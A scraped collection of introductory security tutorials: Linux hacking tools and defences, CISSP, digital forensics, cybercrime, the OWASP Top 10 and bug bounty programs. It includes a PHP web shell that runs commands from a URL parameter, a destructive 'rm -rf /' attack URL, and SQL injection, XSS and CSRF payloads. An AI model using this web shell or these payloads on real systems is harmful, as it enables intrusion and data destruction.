Nessus– this tool can be used to scan configuration settings, patches, and networks etc. it can be found at http://www.tenable.com/products/nessus
NMap. This tool can be used to monitor hosts that are running on the server and the services that they are utilizing. It can also be used to scan for ports. It can be found at http://nmap.org/
SARA – SARA is the acronym for Security Auditor’s Research Assistant. As the name implies, this tool can be used to audit networks against threats such as SQL Injection, XSS etc. it can be found at http://www-arc.com/sara/sara.html
The above list is not exhaustive; it gives you an idea of the tools available for hacking Linux systems.
How to prevent Linux hacks
Linux Hacking takes advantage of the vulnerabilities in the operating system. An organization can adopt the following policy to protect itself against such attacks.
Patch management– patches fix bugs that attackers exploit to compromise a system. A good patch management policy will ensure that you constantly apply relevant patches to your system.
Proper OS configuration– other exploits take advantage of the weaknesses in the configuration of the server. Inactive user names and daemons should be disabled. Default settings such as common passwords to application, default user names and some port numbers should be changed.
Intrusion Detection System– such tools can be used to detect unauthorized access to the system. Some tools have the ability to detect and prevent such attacks.
Hacking Activity: Hack a Ubuntu Linux System using PHP
In this practical scenario, we will provide you with basic information on how you can use PHP to compromise a Linux. We are not going to target any victim. If you want to try it out, you can install LAMPP on your local machine.
PHP comes with two functions that can be used to execute Linux commands. It has exec() and shell_exec() functions. The function exec() returns the last line of the command output while the shell_exec() returns the whole result of the command as a string.
For demonstration purposes, let’s assume the attacker managers to upload the following file on a web server.
<?php
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';
echo "executing shell command:-> $cmd</br>";
$output = shell_exec($cmd);
echo "<pre>$output</pre>";
?>
HERE,
The above script gets the command from the GET variable named cmd. The command is executed using shell_exec() and the results returned in the browser.
The above code can be exploited using the following URL
http://localhost/cp/konsole.php?cmd=ls%20-l
HERE,
“…konsole.php?cmd=ls%20-l”assigns the value ls –l to the variable cmd.
The command executed against the server will be
shell_exec('ls -l') ;
Executing the above code on a web server gives results similar to the following.
The above command simply displays the files in the current directory and the permissions
Let’s suppose the attacker passes the following command
rm -rf /
HERE,
“rm” removes the files
“rf” makes the rm command run in a recursive mode. Deleting all the folders and files
“/” instructs the command to start deleting files from the root directory
The attack URL would look something like this
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Summary
Linux is a popular operating system for servers, desktops, tablets and mobile devices.
Linux is open source, and the source code can be obtained by anyone. This makes it easy to spot the vulnerabilities.
Basic and networking commands are valuable to Linux hackers.
Vulnerabilities are a weakness that can be exploited to compromise a system.
A good security can help to protect a system from been compromised by an attacker.
CISSP Certification Guide: What is, Prerequisites, Cost, CISSP Salary
What is CISSP?
CISSP- full form Certified Information Systems Security Professional is considered as a quality standard in the field of information security.
This Cyber certification is offered by (ISC)2 which is an international non-profit organization with more than 200k certified members. The certification was introduced in 1994 and is most required security certification on Linkedin. The exam is available in 8 languages at 882 locations in 114 countries. The certification meets ISO/IEC Standard 17024.
Today, many IT security professionals prefer CISSP certification training. It provides information security professional with an objective to measure competence and a globally recognized standard of achievement.
In this training tutorial, you will learn
Important Domain of CISSP Certificate
A domain is a broad topic that you need to master to ace the CISSP certification exam. Here are the important CISSP Domains:
Domain 1. Security and Risk Management
Domain 2. Asset Security
Domain 3. Security Architecture and Engineering
Domain 4. Communication and Network Security
Domain 5. Identity and Access Management (IAM)
Domain 6. Security Assessment and Testing
Domain 7. Security Operations
Domain 8. Software Development Security
Skills developed after CISSP certification
At the end of the CISSP certification course you will be:
You should able to define the architecture, design, and management of the security of your organization.
You will acquire the related knowledge and skills to become a qualified CISSP certificated professional.
Develop working knowledge in the 8 domains recommended by the CISSP Common Body of Knowledge(CBK)
Learn about Access Control Systems, Security, and Methodology of Software
Able to optimize of Security Operations
Who should do a CISSP certification?
CISSP certification training is important for the following professionals:
Chief Information Security Officer
Director of Security
Network Architect
Security Consultant
Security Manager
Security Auditor
Security Analyst
IT Director/Manager
Managing Cloud security
Security Systems Engineer
How to become CISSP certified?
Here, are some steps that you need to follow to become a CISSP certified professional.
Step 1) Understand Exam Format:
CISSP English is a CAT (Computer Adaptive Test) with 100 to 150 questions. You get 3 hours to take the exam. You need to score 700 out of 1000 to be certified.
Step 2) Match the Eligibility Criteria: Key prerequisites
You need atleast 5 years cumulative paid full-time work experience in at least two domains of the CISSP Common Book of Knowledge.
Getting 4-year college education degree or a regional equivalent of a cissp credential from the (ISC)2 approved list. This helps you to satisfy 1 year of the required experience.
If you don't have the needed experience to become a CISSP professional, you can become an Associate of (ISC)2 by passing the basic level the CISSP examination.
The Associate of (ISC)2 will then get 6 years to earn the 5 years required experience.
Once you get the certification, you should recertify it after every 3 years. Recertification is accomplished by earning continuing professional education (CPE) credits and paying an annual membership fee.
Step 3) Take the Training:
Next, you need to enroll yourself in a CISSP training program to get a comprehensive understanding of the course modules. It helps you to pass the exam successfully and allows you to reduce your exam preparation stress.
Moreover, a certified instructor will guide you regarding the certification exam. You can also take the help of the CISSP training material available to get success in this exam.
Step 4) Generate your own Pearson VUE Account:
To prepare yourself for CISSP exam you need Pearson VUE account for a real evaluation of your gained knowledge. In the Pearson VUE site, you will find details regarding the testing locations, policies, accommodation, etc.
Step 5) Register to Plan Your Exam:
Now processed with the registration, for which you will have to complete the examination agreement.
You need to verify the truth of your assertions regarding your professional experience. You will also require to legally commit to the (ISC)2 code of ethics. Here, you will also need to pay your requested fee for your CISSP exam.
Step 6) Take the Exam:
Clear the CISSP certification exam to judge your skill and ability. Be focused and clear your CISSP certification exam.
Step 7) Take Your (ISC)² Code of Ethics Subscription:
Once you successfully passed the exam, you will have to subscribe to the (ISC)2 Code of Ethics to avail your CISSP certification.
Step 8) Get Yourself Endorsed:
Lastly, you need to endorse your application within nine months from the date of your exam. To verify your professional experience, an endorsement form needs to be finished and signed by an (ISC)2 certified CISSP cloud security professional. He or she should be an active member of the community.
Why become CISSP Certified?
Here, are Important reasons why should enroll for the CISSP certification course:
CISSP is an international certificate course, not specific to any country. This gives you a global recognition.
After attending this training, you will have the technical knowledge, abilities, and skills to develop a holistic security program.
You can stand out from other CISSP certification candidates for a suitable job opening in the market for information security.
You will have access to valued career resources, that would include networking and exchange of ideas with peers.
It also gives you an opportunity to authenticate your skills and competence that you have gain through the years of experience in the cyber security world.
CISSP certification allows you to increase your credibility, can provide you with a secure job.
You will expand your cybersecurity knowledge by enrolling CISSP certificate.
The CISSP certification confirms that you are capable enough of developing information security policies, standards, and procedures.
Allows you to join a professional organization and to link up with like-minded individuals.
Enjoy perks like a free subscription to InfoSecurity Professional Magazine, 50% of (ISC)2 textbooks, attend webinars, digital badges to showcase expertise.
Course Objectives of CISSP Certification
Here, are some objectives to get this certificate course:
Becomes familiar with the (ISC)2 Common Body of Knowledge (CBK) which includes some common terms, principles, lists, categories, etc.
Be familiar with the CISSP exam process.
You should be able to develop a study plan for taking and passing the exam experience.
Helps you to widen your knowledge of software security concepts and practices.
Become more marketable in a competitive workforce
Show your dedication to the security discipline.
Improves the credibility and value of the employees as the (ISC)2 security certifications are recognized internationally.
Increase credibility and goodwill for the organization when working with vendors and contractors.
Empowers you with a universal security language with industry accepted terms and practices.
Guide to ace CISSP certification
Here, are some useful tips for getting CISSP certification.
Determine days you need to prepare for this exam form a local study group and discuss a difficult topic or questions with them.
You should focus on domains that you do not know or are weak.
Perfect yourself with a minimum of 50 questions per domain.
Reach your scores to a consistent 80%
You will mostly need two-three months of study to complete the CISSP course material.
Use multiple study resources, for example, Reference books, Learning materials, online eLearning and free test resources.
Prepare for the endorsement process.
Read the exam questions carefully, and first attempt question for which you know answers.
Watch the clock regularly as you need to attempt 250 questions and 6 hours maximum exam. Or 100 questions in 3 hours for CAT.
Remember that CISSP certification may still contain questions that you might think has been outdated in the real world.
Salary of CISSP certified professional.
According to a study of Global Information Security, CISSP certified professionals earn 25% more salary than the non-certified counterparts. It is among the list of top highest paying jobs by tech republic job trend survey.
Therefore, the salary of a CISSP security professional is much higher as compared to the others who are not certified. However, the pay scale may differ from region to region and country to country.
Summary
CISSP- full form Certified Information Systems Security Professional is considered as a quality standard in the field of information security.
Steps to get CISSP certification are: Match the eligibility criteria, Take the training, Generate your own Pearson VUE Account, Pass the Exam, Take Your (ISC)² Code of Ethics Subscription, Get Yourself Endorsed.
CISSP is an international certificate course, not specific to any country. This gives you a global recognition.
Security and Risk Management, Security Engineering, Communications and Network Security, Identity and Access Management are important domains of CISSP
After the successful CISSP training, you will acquire the related knowledge and skills to become a qualified CISSP certificated professional.
CISSP certification training is relevant to Chief Information Security Officer, Director of Security, Network Architect, Security Consultant, Security Manager, Security Auditor, Security Analyst, etc.
Determine days you need to prepare for this exam form a local study group and discuss a difficult topic or questions with them.
According to a study of Global Information Security CISSP certified professionals earn 25% more salary than the non-certified counterparts.
CISSP certification cost is $699
What is Digital Forensics? History, Process, Types, Challenges
What is Digital Forensics?
Digital Forensics is defined as the process of preservation, identification, extraction, and documentation of computer evidence which can be used by the court of law. It is a science of finding evidence from digital media like a computer, mobile phone, server, or network. It provides the forensic team with the best techniques and tools to solve complicated digital-related cases.
Digital Forensics helps the forensic team to analyzes, inspect, identifies, and preserve the digital evidence residing on various types of electronic devices.
In this digital forensic tutorial, you will learn:
History of Digital forensics
Here, are important landmarks from the history of Digital Forensics:
Hans Gross (1847 -1915): First use of scientific study to head criminal investigations
FBI (1932): Set up a lab to offer forensics services to all field agents and other law authorities across the USA.
In 1978 the first computer crime was recognized in the Florida Computer Crime Act.
Francis Galton (1982 - 1911): Conducted first recorded study of fingerprints
In 1992, the term Computer Forensics was used in academic literature.
1995 International Organization on Computer Evidence (IOCE) was formed.
In 2000, the First FBI Regional Computer Forensic Laboratory established.
In 2002, Scientific Working Group on Digital Evidence (SWGDE) published the first book about digital forensic called "Best practices for Computer Forensics".
In 2010, Simson Garfinkel identified issues facing digital investigations.
Objectives of computer forensics
Here are the essential objectives of using Computer forensics:
It helps to recover, analyze, and preserve computer and related materials in such a manner that it helps the investigation agency to present them as evidence in a court of law.
It helps to postulate the motive behind the crime and identity of the main culprit.
Designing procedures at a suspected crime scene which helps you to ensure that the digital evidence obtained is not corrupted.
Data acquisition and duplication: Recovering deleted files and deleted partitions from digital media to extract the evidence and validate them.
Helps you to identify the evidence quickly, and also allows you to estimate the potential impact of the malicious activity on the victim
Producing a computer forensic report which offers a complete report on the investigation process.
Preserving the evidence by following the chain of custody.
Process of Digital forensics
Digital forensics entails the following steps:
Identification
Preservation
Analysis
Documentation
Presentation
Process of Digital Forensics
Let's study each in detail
Identification
It is the first step in the forensic process. The identification process mainly includes things like what evidence is present, where it is stored, and lastly, how it is stored (in which format).
Electronic storage media can be personal computers, Mobile phones, PDAs, etc.
Preservation
In this phase, data is isolated, secured, and preserved. It includes preventing people from using the digital device so that digital evidence is not tampered with.
Analysis
In this step, investigation agents reconstruct fragments of data and draw conclusions based on evidence found. However, it might take numerous iterations of examination to support a specific crime theory.
Documentation
In this process, a record of all the visible data must be created. It helps in recreating the crime scene and reviewing it. It Involves proper documentation of the crime scene along with photographing, sketching, and crime-scene mapping.
Presentation
In this last step, the process of summarization and explanation of conclusions is done.
However, it should be written in a layperson's terms using abstracted terminologies. All abstracted terminologies should reference the specific details.
Types of Digital Forensics
Three types of digital forensics are:
Disk Forensics:
It deals with extracting data from storage media by searching active, modified, or deleted files.
Network Forensics:
It is a sub-branch of digital forensics. It is related to monitoring and analysis of computer network traffic to collect important information and legal evidence.
Wireless Forensics:
It is a division of network forensics. The main aim of wireless forensics is to offers the tools need to collect and analyze the data from wireless network traffic.
Database Forensics:
It is a branch of digital forensics relating to the study and examination of databases and their related metadata.
Malware Forensics:
This branch deals with the identification of malicious code, to study their payload, viruses, worms, etc.
Email Forensics
Deals with recovery and analysis of emails, including deleted emails, calendars, and contacts.
Memory Forensics:
It deals with collecting data from system memory (system registers, cache, RAM) in raw form and then carving the data from Raw dump.
Mobile Phone Forensics:
It mainly deals with the examination and analysis of mobile devices. It helps to retrieve phone and SIM contacts, call logs, incoming, and outgoing SMS/MMS, Audio, videos, etc.
Challenges faced by Digital Forensics
Here, are major challenges faced by the Digital Forensic:
The increase of PC's and extensive use of internet access
Easy availability of hacking tools
Lack of physical evidence makes prosecution difficult.
The large amount of storage space into Terabytes that makes this investigation job difficult.
Any technological changes require an upgrade or changes to solutions.
Example Uses of Digital Forensics
In recent time, commercial organizations have used digital forensics in following a type of cases:
Intellectual Property theft
Industrial espionage
Employment disputes
Fraud investigations
Inappropriate use of the Internet and email in the workplace
Forgeries related matters
Bankruptcy investigations
Issues concern with the regulatory compliance
Advantages of Digital forensics
Here, are pros/benefits of Digital forensics
To ensure the integrity of the computer system.
To produce evidence in the court, which can lead to the punishment of the culprit.
It helps the companies to capture important information if their computer systems or networks are compromised.
Efficiently tracks down cybercriminals from anywhere in the world.
Helps to protect the organization's money and valuable time.
Allows to extract, process, and interpret the factual evidence, so it proves the cybercriminal action's in the court.
Disadvantages of Digital Forensics
Here, are major cos/ drawbacks of using Digital Forensic
Digital evidence accepted into court. However, it is must be proved that there is no tampering
Producing electronic records and storing them is an extremely costly affair
Legal practitioners must have extensive computer knowledge
Need to produce authentic and convincing evidence
If the tool used for digital forensic is not according to specified standards, then in the court of law, the evidence can be disapproved by justice.
Lack of technical knowledge by the investigating officer might not offer the desired result
Summary:
Digital Forensics is the preservation, identification, extraction, and documentation of computer evidence which can be used in the court of law
Process of Digital forensics includes 1) Identification, 2) Preservation, 3) Analysis, 4) Documentation and, 5) Presentation
Different types of Digital Forensics are Disk Forensics, Network Forensics, Wireless Forensics, Database Forensics, Malware Forensics, Email Forensics, Memory Forensics, etc.
Digital forensic Science can be used for cases like 1) Intellectual Property theft, 2) Industrial espionage 3) Employment disputes, 4) Fraud investigations.
What is Cybercrime? Types, Tools, Examples
What is Cybercrime?
Cybercrime is defined as an unlawful action against any person using a computer, its systems, and its online or offline applications. It occurs when information technology is used to commit or cover an offense. However, the act is only considered Cybercrime if it is intentional and not accidental.
In this tutorial, you will learn:
Example of Cybercrime
Here, are some most commonly occurring Cybercrimes:
The fraud did by manipulating computer network
Unauthorized access to or modification of data or application
Intellectual property theft that includes software piracy
Industrial spying and access to or theft of computer materials
Writing or spreading computer viruses or malware
Digitally distributing child pornography
Cybercrime Attack Types
Cybercrime can attack in various ways. Here, is some most common cybercrime attack mode:
Hacking:
It is an act of gaining unauthorized access to a computer system or network.
Denial Of Service Attack:
In this cyberattack, the cyber-criminal uses the bandwidth of the victim's network or fills their e-mail box with spammy mail. Here, the intention is to disrupt their regular services.
Software Piracy:
Theft of software by illegally copying genuine programs or counterfeiting. It also includes the distribution of products intended to pass for the original.
Phishing:
Pishing is a technique of extracting confidential information from the bank/financial institutional account holders by illegal ways.
Spoofing:
It is an act of getting one computer system or a network to pretend to have the identity of another computer. It is mostly used to get access to exclusive privileges enjoyed by that network or computer.
Cyber Crime Tools
There are many types of Digital forensic tools
Kali Linux is an open-source software that is maintained and funded by Offensive Security. It is a specially designed program for digital forensics and penetration testing.
This tool is mainly used for cracking the hashes, which are generated by the same files of windows. It offers a secure GUI system and allows you to runs on multiple platforms.
This software allows an investigator to image and examine data from hard disks and removable disks.
SafeBack:
SafeBack is mainly using for imaging the hard disks of Intel-based computer systems and restoring these images to some other hard disks.
This is a command-line computer forensic tool. It is freely available for the UNIX Operating system, which can make exact copies of disks suitable for digital forensic analysis.
A tool to check helps you to check data is copied to another storage successfully or not.
Summary:
Cybercrime is an unlawful action against any person using a computer, its systems, and its online or offline applications.
The fraud did by manipulating computer network is an example of Cybercrime
Various types of Cyber crime attack modes are 1) Hacking 2) Denial Of Service Attack 3) Software Piracy 4) Phishing 5) Spoofing.
Some important tool use for preventing cyber attack are 1)Kali Linux, 2) Ophcrack, 3) EnCase, 4) SafeBack, 5) Data Dumber
Kali Linux is an open-source software that is maintained and funded by Offensive Security.
Ophcrack is a tool that is mainly used for cracking the hashes, which are generated by the same files of windows.
EnCase tool allows an investigator to image and examine data from hard disks and removable disks
SafeBack is mainly using for imaging the hard disks of Intel-based computer systems and restoring these images to some other hard disks.
Data dumper is a command-line computer forensic tool.
Md5sum is a helps you to check data is copied to another storage successfully or not.
10 Most Common Web Security Vulnerabilities
OWASP or Open Web Security Project is a non-profit charitable organization focused on improving the security of software and web applications.
The organization publishes a list of top web security vulnerabilities based on the data from various security organizations.
The web security vulnerabilities are prioritized depending on exploitability, detectability and impact on software.
Exploitability –
What is needed to exploit the security vulnerability? Highest exploitability when the attack needs only web browser and lowest being advanced programming and tools.Detectability –
How easy is it to detect the threat? Highest being the information displayed on URL, Form or Error message and lowest being source code.Impact or Damage –
How much damage will be done if the security vulnerability is exposed or attacked? Highest being complete system crash and lowest being nothing at all.
The main aim of OWASP Top 10 is to educate the developers, designers, managers, architects and organizations about the most important security vulnerabilities.
The Top 10 security vulnerabilities as per OWASP Top 10 are:
SQL Injection
Description
Injection is a security vulnerability that allows an attacker to alter backend SQL statements by manipulating the user supplied data.
Injection occurs when the user input is sent to an interpreter as part of command or query and trick the interpreter into executing unintended commands and gives access to unauthorized data.
The SQL command which when executed by web application can also expose the back-end database.
Implication
An attacker can inject malicious content into the vulnerable fields.
Sensitive data like User Names, Passwords, etc. can be read from the database.
Database data can be modified (Insert/Update/ Delete).
Administration Operations can be executed on the database
Vulnerable Objects
Input Fields
URLs interacting with the database.
Examples:
SQL injection on the Login Page
Logging into an application without having valid credentials.
Valid userName is available, and password is not available.
Test URL: http://demo.testfire.net/default.aspx
User Name: sjones
Password: 1=1' or pass123
SQL query created and sent to Interpreter as below
SELECT * FROM Users WHERE User_Name = sjones AND Password = 1=1' or pass123;
Recommendations
White listing the input fields
Avoid displaying detailed error messages that are useful to an attacker.
Cross Site Scripting
Description
Cross Site Scripting is also shortly known as XSS.
XSS vulnerabilities target scripts embedded in a page that are executed on the client side i.e. user browser rather then at the server side. These flaws can occur when the application takes untrusted data and send it to the web browser without proper validation.
Attackers can use XSS to execute malicious scripts on the users in this case victim browsers. Since the browser cannot know if the script is trusty or not, the script will be executed, and the attacker can hijack session cookies, deface websites, or redirect the user to an unwanted and malicious websites.
XSS is an attack which allows the attacker to execute the scripts on the victim's browser.
Implication:
Making the use of this security vulnerability, an attacker can inject scripts into the application, can steal session cookies, deface websites, and can run malware on the victim's machines.
Vulnerable Objects
Input Fields
URLs
Examples
1. http://www.vulnerablesite.com/home?"<script>alert("xss")</script>
The above script when run on a browser, a message box will be displayed if the site is vulnerable to XSS.
The more serious attack can be done if the attacker wants to display or store session cookie.
2. http://demo.testfire.net/search.aspx?txtSearch <iframe> <src = http://google.com width = 500 height 500></iframe>
The above script when run, the browser will load an invisible frame pointing to http://google.com.
The attack can be made serious by running a malicious script on the browser.
Recommendations
White Listing input fields
Input Output encoding
Broken Authentication and Session Management
Description
The websites usually create a session cookie and session ID for each valid session, and these cookies contain sensitive data like username, password, etc. When the session is ended either by logout or browser closed abruptly, these cookies should be invalidated i.e. for each session there should be a new cookie.
If the cookies are not invalidated, the sensitive data will exist in the system. For example, a user using a public computer (Cyber Cafe), the cookies of the vulnerable site sits on the system and exposed to an attacker. An attacker uses the same public computer after some time, the sensitive data is compromised.
In the same manner, a user using a public computer, instead of logging off, he closes the browser abruptly. An attacker uses the same system, when browses the same vulnerable site, the previous session of the victim will be opened. The attacker can do whatever he wants to do from stealing profile information, credit card information, etc.
A check should be done to find the strength of the authentication and session management. Keys, session tokens, cookies should be implemented properly without compromising passwords.
Vulnerable Objects
Session IDs exposed on URL can lead to session fixation attack.
Session IDs same before and after logout and login.
Session Timeouts are not implemented correctly.
Application is assigning same session ID for each new session.
Authenticated parts of the application are protected using SSL and passwords are stored in hashed or encrypted format.
The session can be reused by a low privileged user.
Implication
Making use of this vulnerability, an attacker can hijack a session, gain unauthorized access to the system which allows disclosure and modification of unauthorized information.
The sessions can be high jacked using stolen cookies or sessions using XSS.
Examples
Airline reservation application supports URL rewriting, putting session IDs in the URL:
http://Examples.com/sale/saleitems;jsessionid=2P0OC2oJM0DPXSNQPLME34SERTBG/dest=Maldives (Sale of tickets to Maldives)
An authenticated user of the site wants to let his friends know about the sale and sends an email across. The friends receive the session ID and can be used to do unauthorized modifications or misuse the saved credit card details.An application is vulnerable to XSS, by which an attacker can access the session ID and can be used to hijack the session.
Applications timeouts are not set properly. The user uses a public computer and closes the browser instead of logging off and walks away. The attacker uses the same browser some time later, and the session is authenticated.
Recommendations
All the authentication and session management requirements should be defined as per OWASP Application Security Verification Standard.
Never expose any credentials in URLs or Logs.
Strong efforts should be also made to avoid XSS flaws which can be used to steal session IDs.
Insecure Direct Object References
Description
It occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key as in URL or as a FORM parameter. The attacker can use this information to access other objects and can create a future attack to access the unauthorized data.
Implication
Using this vulnerability, an attacker can gain access to unauthorized internal objects, can modify data or compromise the application.
Vulnerable Objects
In the URL.
Examples:
Changing "userid" in the following URL can make an attacker to view other user's information.
http://www.vulnerablesite.com/userid=123 Modified to http://www.vulnerablesite.com/userid=124
An attacker can view others information by changing user id value.
Recommendations:
Implement access control checks.
Avoid exposing object references in URLs.
Verify authorization to all reference objects.
Cross Site Request Forgery
Description
Cross Site Request Forgery is a forged request came from the cross site.
CSRF attack is an attack that occurs when a malicious website, email, or program causes a user's browser to perform an unwanted action on a trusted site for which the user is currently authenticated.
A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application.
A link will be sent by the attacker to the victim when the user clicks on the URL when logged into the original website, the data will be stolen from the website.
Implication
Using this vulnerability as an attacker can change user profile information, change status, create a new user on admin behalf, etc.
Vulnerable Objects
User Profile page
User account forms
Business transaction page
Examples
The victim is logged into a bank website using valid credentials. He receives mail from an attacker saying "Please click here to donate $1 to cause."
When the victim clicks on it, a valid request will be created to donate $1 to a particular account.
http://www.vulnerablebank.com/transfer.do?account=cause&amount=1
The attacker captures this request and creates below request and embeds in a button saying "I Support Cause."
http://www.vulnerablebank.com/transfer.do?account=Attacker&amount=1000
Since the session is authenticated and the request is coming through the bank website, the server would transfer $1000 dollars to the attacker.
Recommendation
Mandate user's presence while performing sensitive actions.
Implement mechanisms like CAPTCHA, Re-Authentication, and Unique Request Tokens.
Security Misconfiguration
Description
Security Configuration must be defined and deployed for the application, frameworks, application server, web server, database server, and platform. If these are properly configured, an attacker can have unauthorized access to sensitive data or functionality.
Sometimes such flaws result in complete system compromise. Keeping the software up to date is also good security.
Implication
Making use of this vulnerability, the attacker can enumerate the underlying technology and application server version information, database information and gain information about the application to mount few more attacks.
Vulnerable objects
URL
Form Fields
Input fields
Examples
The application server admin console is automatically installed and not removed. Default accounts are not changed. The attacker can log in with default passwords and can gain unauthorized access.
Directory Listing is not disabled on your server. Attacker discovers and can simply list directories to find any file.
Recommendations
A strong application architecture that provides good separation and security between the components.
Change default usernames and passwords.
Disable directory listings and implement access control checks.
Insecure Cryptographic Storage
Description
Insecure Cryptographic storage is a common vulnerability which exists when the sensitive data is not stored securely.
The user credentials, profile information, health details, credit card information, etc. come under sensitive data information on a website.
This data will be stored on the application database. When this data are stored improperly by not using encryption or hashing*, it will be vulnerable to the attackers.
(*Hashing is transformation of the string characters into shorter strings of fixed length or a key. To decrypt the string, the algorithm used to form the key should be available)
Implication
By using this vulnerability, an attacker can steal, modify such weakly protected data to conduct identity theft, credit card fraud or other crimes.
Vulnerable objects
Application database.
Examples
In one of the banking application, password database uses unsalted hashes * to store everyone's passwords. An SQL injection flaw allows the attacker to retrieve the password file. All the unsalted hashes can be brute forced in no time whereas, the salted passwords would take thousands of years.
(*Unsalted Hashes – Salt is a random data appended to the original data. Salt is appended to the password before hashing)
Recommendations
Ensure appropriate strong standard algorithms. Do not create own cryptographic algorithms. Use only approved public algorithms such as AES, RSA public key cryptography, and SHA-256, etc.
Ensure offsite backups are encrypted, but the keys are managed and backed up separately.
Failure to restrict URL Access
Description
Web applications check URL access rights before rendering protected links and buttons. Applications need to perform similar access control checks each time these pages are accessed.
In most of the applications, the privileged pages, locations and resources are not presented to the privileged users.
By an intelligent guess, an attacker can access privilege pages. An attacker can access sensitive pages, invoke functions and view confidential information.
Implication
Making use of this vulnerability attacker can gain access to the unauthorized URLs, without logging into the application and exploit the vulnerability. An attacker can access sensitive pages, invoke functions and view confidential information.
Vulnerable objects:
URLs
Examples
Attacker notices the URL indicates the role as "/user/getaccounts." He modifies as "/admin/getaccounts".
An attacker can append role to the URL.
http://www.vulnerablsite.com can be modified as http://www.vulnerablesite.com/admin
Recommendations
Implement strong access control checks.
Authentication and authorization policies should be role-based.
Restrict access to unwanted URLs.
Insufficient Transport Layer Protection
Description
Deals with information exchange between the user (client) and the server (application). Applications frequently transmit sensitive information like authentication details, credit card information, and session tokens over a network.
By using weak algorithms or using expired or invalid certificates or not using SSL can allow the communication to be exposed to untrusted users, which may compromise a web application and or steal sensitive information.
Implication
Making use of this web security vulnerability, an attacker can sniff legitimate user's credentials and gaining access to the application.
Can steal credit card information.
Vulnerable objects
Data sent over the network.
Recommendations
Enable secure HTTP and enforce credential transfer over HTTPS only.
Ensure your certificate is valid and not expired.
Examples:
1. An application not using SSL, an attacker will simply monitor network traffic and observes an authenticated victim session cookie. An attacker can steal that cookie and perform Man-in-the-Middle attack.
Unvalidated Redirects and Forwards
Description
The web application uses few methods to redirect and forward users to other pages for an intended purpose.
If there is no proper validation while redirecting to other pages, attackers can make use of this and can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.
Implication
An attacker can send a URL to the user that contains a genuine URL appended with encoded malicious URL. A user by just seeing the genuine part of the attacker sent URL can browse it and may become a victim.
Examples
1.http://www.vulnerablesite.com/login.aspx?redirectURL=ownsite.com
Modified to
http://www.vulnerablesite.com/login.aspx?redirectURL=evilsite.com
Recommendations
Simply avoid using redirects and forwards in the application. If used, do not involve using user parameters in calculating the destination.
If the destination parameters can't be avoided, ensure that the supplied value is valid, and authorized for the user.
Top 30 Bug Bounty Programs in 2020
Below is a curated list of Bounty Programs by reputable companies
1) Intel
Intel's bounty program mainly targets the company's hardware, firmware, and software.
Limitations: It does not include recent acquisitions, the company's web infrastructure, third-party products, or anything relating to McAfee.
Minimum Payout: Intel offers a minimum amount of $500 for finding bugs in their system.
Maximum Payout: The Company pays $30,000 maximum for detecting critical bugs.
Bounty Link: https://security-center.intel.com/BugBountyProgram.aspx
2) Yahoo
Yahoo has its dedicated team that accepts vulnerability reports from security researchers and ethical hackers.
Limitations: The Company does not offer any reward for finding bugs in yahoo.net, Yahoo 7 Yahoo Japan, Onwander and Yahoo operated Word press blogs.
Minimum Payout: There is no set limit on Yahoo for minimum payout.
Maximum Payout: Yahoo can pay $15000 for detecting important bugs in their system.
Bounty Link:https://safety.yahoo.com/Security/REPORTING-ISSUES.html
3) Snapchat
Snapchat security team reviews all vulnerability reports and acts upon them by responsible disclosure. The company, we will acknowledge your submission within 30 days.
Minimum Payout: Snapchat will pay minimum $2000.
Maximum Payout: Maximum they will pay is $15,000.
Bounty Link:https://support.snapchat.com/en-US/i-need-help
4) Cisco
Cisco encourages individuals or organization that are experiencing a product security issue to report them to the company.
Minimum Payout: Cisco's minimum payout amount is $100.
Maximum Payout: Company will give maximum $2,500 to finding serious vulnerabilities.
Bounty Link: https://www.cisco.com/c/en/us/about/security-center/security-vulnerability-policy.html
5) Dropbox
Dropbox bounty program allows security researchers to report bugs and vulnerabilities on the third party service HackerOne.
Minimum Payout: The minimum amount paid is $12,167.
Maximum Payout: The maximum amount offered is $32,768.
Bounty Link: https://www.dropbox.com/help/security/report-vulnerability
6) Apple
When Apple first launched its bug bounty program it allowed just 24 security researchers. The framework then expanded to include more bug bounty hunters.
The company will pay $100,000 to those who can extract data protected by Apple's Secure Enclave technology.
Minimum Payout: There is no limited amount fixed by Apple Inc.
Maximum payout: The highest bounty given by Apple is $200,000 for security issues affecting its firmware.
Bounty Link: https://support.apple.com/en-au/HT201220
7) Facebook
Under Facebook's bug bounty program users can report a security issue on Facebook, Instagram, Atlas, WhatsApp, etc.
Limitations: There are a few security issues that the social networking platform considers out-of-bounds.
Minimum Payout: Facebook will pay a minimum of $500 for a disclosed vulnerability.
Maximum Payout: There is no upper limit fixed by Facebook for the Payout.
Bounty Link: https://www.facebook.com/whitehat/
8) Google
Every content in the .google.com, .blogger, youtube.com are open for Google's vulnerability rewards program.
Limitations: This bounty program only covers design and implementation issues.
Minimum Payout: Google will pay minimum $300 for finding security threads.
Maximum Payout: Google will pay the highest bounty of $31.337 for normal Google applications.
Bounty Link: https://www.google.com/about/appsecurity/reward-program/
9) Quora
Quora offers Bug Bounty program to all users and researchers to find and report security vulnerabilities.
Minimum Payout: Quora will pay minimum $100 for finding vulnerabilities on their site.
Maximum Payout: Maximum payout offered by this site is $7000.
Bounty Link: https://engineering.quora.com/Security-Bug-Bounty-Program
10) Mozilla
Mozilla rewards for vulnerability discoveries by ethical hackers and security researchers.
Limitations: The bounty is offered only for bugs in Mozilla services, such as Firefox, Thunderbird and other related applications and services.
Minimum Payout: Minium amount given by Firefox is $500.
Maximum Payout: The Company is paying a maximum of $5000.
Bounty Link: https://www.mozilla.org/en-US/security/bug-bounty/
11) Microsoft
Microsoft's current bug bounty program was officially launched on 23rd September 2014 and deals only with Online Services.
Limitations: The bounty reward is only given for the critical and important vulnerabilities.
Minimum Payout: Microsoft ready to pay $15,000 for finding critical bugs.
Maximum Payout: Maximum amount can be $250,000.
Bounty Link: https://technet.microsoft.com/en-us/library/dn425036.aspx
12) OpenSSL
OpenSSL bounty allows you to report vulnerabilities using secure email (PGP Key). You can also report vulnerabilities to the OpenSSL Management Committee.
Minimum Payout: The Company pays minimum bounty rewards of $500.
Maximum Payout: The highest amount given by the company is $5000.
Bounty Link: https://www.openssl.org/news/vulnerabilities.html
13) Vimeo
Vimeo welcomes any security vulnerability reporting in their products as the company pays good rewards to that person.
